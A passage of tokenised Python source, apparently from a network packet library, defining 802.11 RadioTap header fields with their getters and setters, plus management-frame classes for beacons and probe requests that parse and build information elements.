RTF_DBM_ANTNOISE ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:6> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_LOCK_QUALITY ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:7> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_TX_ATTENUATION ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:8> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_DB_TX_ATTENUATION ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:9> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_DBM_TX_POWER ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:10> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_ANTENNA ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:11> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DB_ANTSIGNAL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:12> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DB_ANTNOISE ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_FCS_IN_HEADER ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:4> <EOL> class RTF_TX_FLAGS ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:15> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:2> <EOL> class RTF_RTS_RETRIES ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT:16> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_DATA_RETRIES ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = "<STR_LIT>" <EOL> class RTF_XCHANNEL ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = "<STR_LIT>" <EOL> ALIGNMENT = <NUM_LIT:4> <EOL> class RTF_EXT ( __RadioTapField ) : <EOL> BIT_NUMBER = <NUM_LIT> <EOL> STRUCTURE = [ ] <EOL> radiotap_fields = __RadioTapField . __subclasses__ ( ) <EOL> radiotap_fields . sort ( lambda x , y : cmp ( x . BIT_NUMBER , y . BIT_NUMBER ) ) <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> if aBuffer : <EOL> length = struct . unpack ( '<STR_LIT>' , aBuffer [ <NUM_LIT:2> : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> header_size = length <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . load_packet ( aBuffer ) <EOL> else : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . set_version ( <NUM_LIT:0> ) <EOL> self . __set_present ( <NUM_LIT> ) <EOL> def get_header_length ( self ) : <EOL> '<STR_LIT>' <EOL> self . __update_header_length ( ) <EOL> return self . header . get_word ( <NUM_LIT:2> , "<STR_LIT:<>" ) <EOL> def get_version ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return b <EOL> def set_version ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:0> , nb ) <EOL> nb = ( value & <NUM_LIT> ) <EOL> def get_present ( self , offset = _BASE_PRESENT_FLAGS_OFFSET ) : <EOL> "<STR_LIT>" <EOL> present = self . header . get_long ( offset , "<STR_LIT:<>" ) <EOL> return present <EOL> def __set_present ( self , value ) : <EOL> "<STR_LIT>" <EOL> self . header . set_long ( <NUM_LIT:4> , value ) <EOL> def get_present_bit ( self , field , offset = <NUM_LIT:4> ) : <EOL> '<STR_LIT>' <EOL> present = self . get_present ( offset ) <EOL> return not not ( <NUM_LIT:2> ** field . BIT_NUMBER & present ) <EOL> def __set_present_bit ( self , field ) : <EOL> '<STR_LIT>' <EOL> npresent = <NUM_LIT:2> ** field . BIT_NUMBER | self . get_present ( ) <EOL> self . header . set_long ( <NUM_LIT:4> , npresent , '<STR_LIT:<>' ) <EOL> def __unset_present_bit ( self , field ) : <EOL> '<STR_LIT>' <EOL> npresent = ~ ( <NUM_LIT:2> ** field . BIT_NUMBER ) & self . get_present ( ) <EOL> self . header . set_long ( <NUM_LIT:4> , npresent , '<STR_LIT:<>' ) <EOL> def __align ( self , val , align ) : <EOL> return ( ( ( ( val ) + ( ( align ) - <NUM_LIT:1> ) ) & ~ ( ( align ) - <NUM_LIT:1> ) ) - val ) <EOL> def __get_field_position ( self , field ) : <EOL> offset = RadioTap . _BASE_PRESENT_FLAGS_OFFSET <EOL> extra_present_flags_count = <NUM_LIT:0> <EOL> while self . get_present_bit ( RadioTap . RTF_EXT , offset ) : <EOL> offset += RadioTap . _PRESENT_FLAGS_SIZE <EOL> extra_present_flags_count += <NUM_LIT:1> <EOL> field_position = self . __HEADER_BASE_SIZE + ( RadioTap . _BASE_PRESENT_FLAGS_OFFSET * extra_present_flags_count ) <EOL> for f in self . radiotap_fields : <EOL> field_position += self . __align ( field_position , f . ALIGNMENT ) <EOL> if f == field : <EOL> return field_position <EOL> if self . get_present_bit ( f ) : <EOL> total_length = struct . calcsize ( f . STRUCTURE ) <EOL> field_position += total_length <EOL> return None <EOL> def unset_field ( self , field ) : <EOL> is_present = self . get_present_bit ( field ) <EOL> if is_present is False : <EOL> return False <EOL> byte_pos = self . __get_field_position ( field ) <EOL> if not byte_pos : <EOL> return False <EOL> self . __unset_present_bit ( field ) <EOL> header = self . get_header_as_string ( ) <EOL> total_length = struct . calcsize ( field . STRUCTURE ) <EOL> header = header [ : byte_pos ] + header [ byte_pos + total_length : ] <EOL> self . load_header ( header ) <EOL> def __get_field_values ( self , field ) : <EOL> is_present = self . get_present_bit ( field ) <EOL> if is_present is False : <EOL> return None <EOL> byte_pos = self . __get_field_position ( field ) <EOL> header = self . get_header_as_string ( ) <EOL> total_length = struct . calcsize ( field . STRUCTURE ) <EOL> v = header [ byte_pos : byte_pos + total_length ] <EOL> field_values = struct . unpack ( field . STRUCTURE , v ) <EOL> return field_values <EOL> def __set_field_values ( self , field , values ) : <EOL> if not hasattr ( values , '<STR_LIT>' ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> num_fields = len ( field . STRUCTURE . translate ( string . maketrans ( "<STR_LIT>" , "<STR_LIT>" ) , '<STR_LIT>' ) ) <EOL> if len ( values ) != num_fields : <EOL> raise Exception ( "<STR_LIT>" % ( str ( field ) , struct . calcsize ( field . STRUCTURE ) ) ) <EOL> is_present = self . get_present_bit ( field ) <EOL> if is_present is False : <EOL> self . __set_present_bit ( field ) <EOL> byte_pos = self . __get_field_position ( field ) <EOL> header = self . get_header_as_string ( ) <EOL> total_length = struct . calcsize ( field . STRUCTURE ) <EOL> v = header [ byte_pos : byte_pos + total_length ] <EOL> new_str = struct . pack ( field . STRUCTURE , * values ) <EOL> if is_present is True : <EOL> header = header [ : byte_pos ] + new_str + header [ byte_pos + total_length : ] <EOL> else : <EOL> header = header [ : byte_pos ] + new_str + header [ byte_pos : ] <EOL> self . load_header ( header ) <EOL> def set_tsft ( self , nvalue ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( RadioTap . RTF_TSFT , [ nvalue ] ) <EOL> def get_tsft ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( RadioTap . RTF_TSFT ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_flags ( self , nvalue ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_FLAGS , [ nvalue ] ) <EOL> def get_flags ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_FLAGS ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_rate ( self , nvalue ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_RATE , [ nvalue ] ) <EOL> def get_rate ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_RATE ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_channel ( self , freq , flags ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_CHANNEL , [ freq , flags ] ) <EOL> def get_channel ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_CHANNEL ) <EOL> return values <EOL> def set_FHSS ( self , hop_set , hop_pattern ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_FHSS , [ hop_set , hop_pattern ] ) <EOL> def get_FHSS ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_FHSS ) <EOL> return values <EOL> def set_dBm_ant_signal ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DBM_ANTSIGNAL , [ signal ] ) <EOL> def get_dBm_ant_signal ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DBM_ANTSIGNAL ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dBm_ant_noise ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DBM_ANTNOISE , [ signal ] ) <EOL> def get_dBm_ant_noise ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DBM_ANTNOISE ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_lock_quality ( self , quality ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_LOCK_QUALITY , [ quality ] ) <EOL> def get_lock_quality ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_LOCK_QUALITY ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_tx_attenuation ( self , power ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_TX_ATTENUATION , [ power ] ) <EOL> def get_tx_attenuation ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_TX_ATTENUATION ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dB_tx_attenuation ( self , power ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DB_TX_ATTENUATION , [ power ] ) <EOL> def get_dB_tx_attenuation ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DB_TX_ATTENUATION ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dBm_tx_power ( self , power ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DBM_TX_POWER , [ power ] ) <EOL> def get_dBm_tx_power ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DBM_TX_POWER ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_antenna ( self , antenna_index ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_ANTENNA , [ antenna_index ] ) <EOL> def get_antenna ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_ANTENNA ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dB_ant_signal ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DB_ANTSIGNAL , [ signal ] ) <EOL> def get_dB_ant_signal ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DB_ANTSIGNAL ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_dB_ant_noise ( self , signal ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DB_ANTNOISE , [ signal ] ) <EOL> def get_dB_ant_noise ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DB_ANTNOISE ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_FCS_in_header ( self , fcs ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_FCS_IN_HEADER , [ fcs ] ) <EOL> def get_FCS_in_header ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_FCS_IN_HEADER ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_RTS_retries ( self , retries ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_RTS_RETRIES , [ retries ] ) <EOL> def get_RTS_retries ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_RTS_RETRIES ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_tx_flags ( self , flags ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_TX_FLAGS , [ flags ] ) <EOL> def get_tx_flags ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_TX_FLAGS ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_xchannel ( self , flags , freq , channel , maxpower ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_XCHANNEL , [ flags , freq , channel , maxpower ] ) <EOL> def get_xchannel ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( field = self . RTF_XCHANNEL ) <EOL> return values <EOL> def set_data_retries ( self , retries ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_DATA_RETRIES , [ retries ] ) <EOL> def get_data_retries ( self ) : <EOL> "<STR_LIT>" <EOL> values = self . __get_field_values ( self . RTF_DATA_RETRIES ) <EOL> if not values : <EOL> return None <EOL> return values [ <NUM_LIT:0> ] <EOL> def set_hardware_queue ( self , queue ) : <EOL> "<STR_LIT>" <EOL> self . __set_field_values ( self . RTF_HARDWARE_QUEUE , [ queue ] ) <EOL> def __update_header_length ( self ) : <EOL> '<STR_LIT>' <EOL> self . header . set_word ( <NUM_LIT:2> , self . get_header_size ( ) , "<STR_LIT:<>" ) <EOL> def get_packet ( self ) : <EOL> self . __update_header_length ( ) <EOL> return ProtocolPacket . get_packet ( self ) <EOL> class Dot11ManagementFrame ( ProtocolPacket ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT> <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_duration ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_duration ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_destination_address ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:2> : <NUM_LIT:8> ] <EOL> def set_destination_address ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:2> + i , value [ i ] ) <EOL> def get_source_address ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT:8> : <NUM_LIT> ] <EOL> def set_source_address ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT:8> + i , value [ i ] ) <EOL> def get_bssid ( self ) : <EOL> '<STR_LIT>' <EOL> return self . header . get_bytes ( ) [ <NUM_LIT> : <NUM_LIT:20> ] <EOL> def set_bssid ( self , value ) : <EOL> '<STR_LIT>' <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:6> ) : <EOL> self . header . set_byte ( <NUM_LIT> + i , value [ i ] ) <EOL> def get_sequence_control ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_sequence_control ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_fragment_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . get_sequence_control ( ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_fragment_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_sequence_number ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . get_sequence_control ( ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> def set_sequence_number ( self , value ) : <EOL> '<STR_LIT>' <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_word ( <NUM_LIT:20> , "<STR_LIT:<>" ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:4> ) <EOL> self . header . set_word ( <NUM_LIT:20> , nb , "<STR_LIT:<>" ) <EOL> def get_frame_body ( self ) : <EOL> '<STR_LIT>' <EOL> return self . get_body_as_string ( ) <EOL> def set_frame_body ( self , data ) : <EOL> '<STR_LIT>' <EOL> self . load_body ( data ) <EOL> class DOT11_MANAGEMENT_ELEMENTS ( ) : <EOL> SSID = <NUM_LIT:0> <EOL> SUPPORTED_RATES = <NUM_LIT:1> <EOL> FH_PARAMETER_SET = <NUM_LIT:2> <EOL> DS_PARAMETER_SET = <NUM_LIT:3> <EOL> CF_PARAMETER_SET = <NUM_LIT:4> <EOL> TIM = <NUM_LIT:5> <EOL> IBSS_PARAMETER_SET = <NUM_LIT:6> <EOL> COUNTRY = <NUM_LIT:7> <EOL> HOPPING_PARAMETER = <NUM_LIT:8> <EOL> HOPPING_TABLE = <NUM_LIT:9> <EOL> REQUEST = <NUM_LIT:10> <EOL> BSS_LOAD = <NUM_LIT:11> <EOL> EDCA_PARAMETER_SET = <NUM_LIT:12> <EOL> TSPEC = <NUM_LIT> <EOL> TCLAS = <NUM_LIT> <EOL> SCHEDULE = <NUM_LIT:15> <EOL> CHALLENGE_TEXT = <NUM_LIT:16> <EOL> POWER_CONSTRAINT = <NUM_LIT:32> <EOL> POWER_CAPABILITY = <NUM_LIT> <EOL> TPC_REQUEST = <NUM_LIT> <EOL> TPC_REPORT = <NUM_LIT> <EOL> SUPPORTED_CHANNELS = <NUM_LIT> <EOL> CHANNEL_SWITCH_ANN = <NUM_LIT> <EOL> MEASURE_REQ = <NUM_LIT> <EOL> MEASURE_REP = <NUM_LIT> <EOL> QUIET = <NUM_LIT> <EOL> IBSS_DFS = <NUM_LIT> <EOL> ERP_INFO = <NUM_LIT> <EOL> TS_DELAY = <NUM_LIT> <EOL> TCLAS_PROCESSING = <NUM_LIT> <EOL> QOS_CAPABILITY = <NUM_LIT> <EOL> RSN = <NUM_LIT> <EOL> EXT_SUPPORTED_RATES = <NUM_LIT:50> <EOL> EXTENDED_CAPABILITIES = <NUM_LIT> <EOL> VENDOR_SPECIFIC = <NUM_LIT> <EOL> class Dot11ManagementHelper ( ProtocolPacket ) : <EOL> def __init__ ( self , header_size , tail_size , aBuffer = None ) : <EOL> self . __HEADER_BASE_SIZE = header_size <EOL> if aBuffer : <EOL> elements_length = self . __calculate_elements_length ( aBuffer [ self . __HEADER_BASE_SIZE : ] ) <EOL> header_size += elements_length <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> self . load_packet ( aBuffer ) <EOL> else : <EOL> ProtocolPacket . __init__ ( self , header_size , tail_size ) <EOL> def _find_element ( self , elements , element_id ) : <EOL> remaining = len ( elements ) <EOL> offset = <NUM_LIT:0> <EOL> while remaining > <NUM_LIT:0> : <EOL> ( id , length ) = struct . unpack ( "<STR_LIT>" , elements [ offset : offset + <NUM_LIT:2> ] ) <EOL> if element_id is None : <EOL> pass <EOL> elif id == element_id : <EOL> yield ( <NUM_LIT:0> , offset , length + <NUM_LIT:2> ) <EOL> length += <NUM_LIT:2> <EOL> offset += length <EOL> if length > remaining : <EOL> length = remaining ; <EOL> remaining -= length <EOL> yield ( - <NUM_LIT:1> , offset , None ) <EOL> def __calculate_elements_length ( self , elements ) : <EOL> gen_tp = self . _find_element ( elements , None ) <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> if match != - <NUM_LIT:1> : <EOL> raise Exception ( "<STR_LIT>" % match ) <EOL> return offset <EOL> def _get_elements_generator ( self , element_id ) : <EOL> elements = self . get_header_as_string ( ) [ self . __HEADER_BASE_SIZE : ] <EOL> gen_tp = self . _find_element ( elements , element_id ) <EOL> while True : <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> if match != <NUM_LIT:0> : <EOL> return <EOL> value_offset = offset + <NUM_LIT:2> <EOL> value_end = offset + length <EOL> value = elements [ value_offset : value_end ] <EOL> yield value <EOL> def _get_element ( self , element_id ) : <EOL> gen_get_element = self . _get_elements_generator ( element_id ) <EOL> try : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return s <EOL> except StopIteration : <EOL> pass <EOL> return None <EOL> def delete_element ( self , element_id , multiple = False ) : <EOL> header = self . get_header_as_string ( ) <EOL> elements = header [ self . __HEADER_BASE_SIZE : ] <EOL> gen_tp = self . _find_element ( elements , element_id ) <EOL> found = False <EOL> while True : <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> if match != <NUM_LIT:0> : <EOL> break <EOL> start = self . __HEADER_BASE_SIZE + offset <EOL> header = header [ : start ] + header [ start + length : ] <EOL> found = True <EOL> if multiple is False : <EOL> break <EOL> if not found : <EOL> return False <EOL> self . load_header ( header ) <EOL> return True <EOL> def _set_element ( self , element_id , value , replace = True ) : <EOL> parameter = struct . pack ( '<STR_LIT>' % len ( value ) , element_id , len ( value ) , value ) <EOL> header = self . get_header_as_string ( ) <EOL> elements = header [ self . __HEADER_BASE_SIZE : ] <EOL> gen_tp = self . _find_element ( elements , element_id ) <EOL> found = False <EOL> while True : <EOL> ( match , offset , length ) = gen_tp . next ( ) <EOL> start = self . __HEADER_BASE_SIZE + offset <EOL> if match == <NUM_LIT:0> and replace : <EOL> header = header [ : start ] + parameter + header [ start + length : ] <EOL> found = True <EOL> break <EOL> elif match > <NUM_LIT:0> : <EOL> header = header [ : start ] + parameter + header [ start : ] <EOL> found = True <EOL> break <EOL> else : <EOL> break <EOL> if not found : <EOL> header = header + parameter <EOL> self . load_header ( header ) <EOL> class Dot11ManagementBeacon ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> __HEADER_BASE_SIZE = <NUM_LIT:12> <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = self . __HEADER_BASE_SIZE <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_timestamp ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_long_long ( <NUM_LIT:0> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_timestamp ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_long_long ( <NUM_LIT:0> , nb , "<STR_LIT:<>" ) <EOL> def get_beacon_interval ( self ) : <EOL> '<STR_LIT>' '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:8> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_beacon_interval ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:8> , nb , "<STR_LIT:<>" ) <EOL> def get_capabilities ( self ) : <EOL> '<STR_LIT>' <EOL> b = self . header . get_word ( <NUM_LIT:10> , "<STR_LIT:<>" ) <EOL> return b <EOL> def set_capabilities ( self , value ) : <EOL> '<STR_LIT>' <EOL> nb = value & <NUM_LIT> <EOL> self . header . set_word ( <NUM_LIT:10> , nb , "<STR_LIT:<>" ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SSID ) <EOL> def set_ssid ( self , ssid ) : <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SSID , ssid ) <EOL> def get_supported_rates ( self , human_readable = False ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES ) <EOL> if s is None : <EOL> return None <EOL> rates = struct . unpack ( '<STR_LIT>' % len ( s ) , s ) <EOL> if not human_readable : <EOL> return rates <EOL> rates_Mbs = tuple ( map ( lambda x : ( x & <NUM_LIT> ) * <NUM_LIT:0.5> , rates ) ) <EOL> return rates_Mbs <EOL> def set_supported_rates ( self , rates ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> qty_rates = len ( rates ) <EOL> if qty_rates > <NUM_LIT:8> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> rates_string = struct . pack ( '<STR_LIT:B>' * qty_rates , * rates ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . SUPPORTED_RATES , rates_string ) <EOL> def get_ds_parameter_set ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . DS_PARAMETER_SET ) <EOL> if s is None : <EOL> return None <EOL> ( ch , ) = struct . unpack ( '<STR_LIT:B>' , s ) <EOL> return ch <EOL> def set_ds_parameter_set ( self , channel ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> channel_string = struct . pack ( '<STR_LIT:B>' , channel ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . DS_PARAMETER_SET , channel_string ) <EOL> def get_rsn ( self ) : <EOL> "<STR_LIT>" <EOL> s = self . _get_element ( DOT11_MANAGEMENT_ELEMENTS . RSN ) <EOL> if s is None : <EOL> return None <EOL> return s <EOL> def set_rsn ( self , data ) : <EOL> "<STR_LIT>" <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . RSN , data ) <EOL> def get_vendor_specific ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> vs = [ ] <EOL> gen_get_element = self . _get_elements_generator ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC ) <EOL> try : <EOL> while <NUM_LIT:1> : <EOL> s = gen_get_element . next ( ) <EOL> if s is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> oui = s [ : <NUM_LIT:3> ] <EOL> data = s [ <NUM_LIT:3> : ] <EOL> vs . append ( ( oui , data ) ) <EOL> except StopIteration : <EOL> pass <EOL> return vs <EOL> def add_vendor_specific ( self , oui , data ) : <EOL> "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> max_data_len = <NUM_LIT:255> - <NUM_LIT:3> <EOL> data_len = len ( data ) <EOL> if data_len > max_data_len : <EOL> raise Exception ( "<STR_LIT>" % max_data ) <EOL> if len ( oui ) > <NUM_LIT:3> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> self . _set_element ( DOT11_MANAGEMENT_ELEMENTS . VENDOR_SPECIFIC , oui + data , replace = False ) <EOL> class Dot11ManagementProbeRequest ( Dot11ManagementHelper ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , aBuffer = None ) : <EOL> header_size = <NUM_LIT:0> <EOL> tail_size = <NUM_LIT:0> <EOL> Dot11ManagementHelper . __init__ ( self , header_size , tail_size , aBuffer ) <EOL> def get_ssid ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> return self . _get_element ( 